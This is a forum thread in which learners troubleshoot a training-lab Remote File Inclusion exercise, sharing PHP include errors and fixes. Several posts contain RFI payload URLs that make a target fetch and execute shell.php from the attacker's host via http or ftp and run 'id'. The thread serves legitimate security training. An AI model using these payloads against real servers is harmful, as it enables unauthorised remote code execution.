Academy: Remote File Inclusion page 5

The challenge for this academy tutorial says: “Attack the target, gain command execution by exploiting the RFI vulnerability, and submit the contents of the flag.txt file located in the /exercise directory.”

However, I can’t for the life of me, figure how to recreate the steps shown in the tutorial. I created the python http server on 8080, checked it using the browser (it logs the access in the terminal). I created the shell script (it appears in the directory of the web browser. But, when I try to attack the target using the RFI technique I get nothing. The python server doesn’t log any activity and the history paragraph display an error:
"include(http://localhost:8080/shell.php&cmd=id): failed to open stream: Cannot assign requested address in /var/www/html/index.php on line 47

Warning: include(): Failed opening ‘http://localhost:8080/shell.php&cmd=id’ for inclusion (include_path=‘.:/usr/share/php’) in /var/www/html/index.php on line 47

Notice: Undefined variable: p2 in /var/www/html/index.php on line 48

I’m new to this so my ability to troubleshoot is limited. Did anyone else have this problem, if so were you able to accomplish the task? If so how? Thanks in advance.

you should be changing that localhost:8080 address to the address of your attack box (ex.
10.10.10.10:8080) that you’re using. if you followed the rest of the steps that will work properly.
localhost is just what they used in the example

1 Like

I guess I should have assumed that, sometimes I wish the directions were more explicit… Or I was smarter, lol. Thank you!

Please can you help me? I have problem in this task. Warning: include(http://0.0.0.0:8080/shell.php): failed to open stream: Connection refused in /var/www/html/index.php on line 47. I did everything well I think. Do you have any idea what coud it be? My link is http://RESPAWNED_TARGET_IP/index.php?language=http://0.0.0.0:8080/shell.php&cmd=id. I have http server running and shell.php exist

You shouldn’t use 0.0.0.0 as the ip. Instead, you should use your ip so that the include() statement tries to include your file

Spoiler Removed

hello, i’ve started the python web server on port 8080 and used my machine’s ip using hostname -I | awk '{print $1}', for the host, and the URL looks like http://TARGET_IP/index.php?language=http://MACHINE_IP:8080/shell.php&cmd=id. i’ve tested if shell.php is being served but it gives me Connection timed out. is there something i’m missing?

hi again, i’ve also tried using pyftpdlib and the ftp protocol but now it’s giving me connect() failed: Connection timed out and failed to open stream: operation failed .... again, i’ve tested if shell.php is being served and the URL now is http://TARGET_IP/index.php?language=ftp://MACHINE_IP/shell.php&cmd=id

^^^ ok i solved it

http://RESPAWNTARGET_IP/index.php?language=ftp://MACHINE_IP(tunnel ip given when connected to vpn):PORTUSED/shell.php&cmd=id results in connection timed out and no update on my listener terminal, http://RESPAWNTARGET_IP/index.php?language=ftp:/RESPAWNTARGET_IP/shell.php&cmd=id results in the same… upon browsing MACHINE_IP:PORTUSED shell.php is visible and terminal listiener registers that it was accessed. My problem is that RESPAWNTARGET_IP and my binded to tunnel VPN IP http server do not communicate upon entering given command, AT ALL, given no commands, given different commands i am stuck bad.

I got the same problem

Do you remember how to fix it?

The error doesn’t mean anything. You simply need to correct your syntax in the url, at least that was my problem. Medium has a good article on the machine.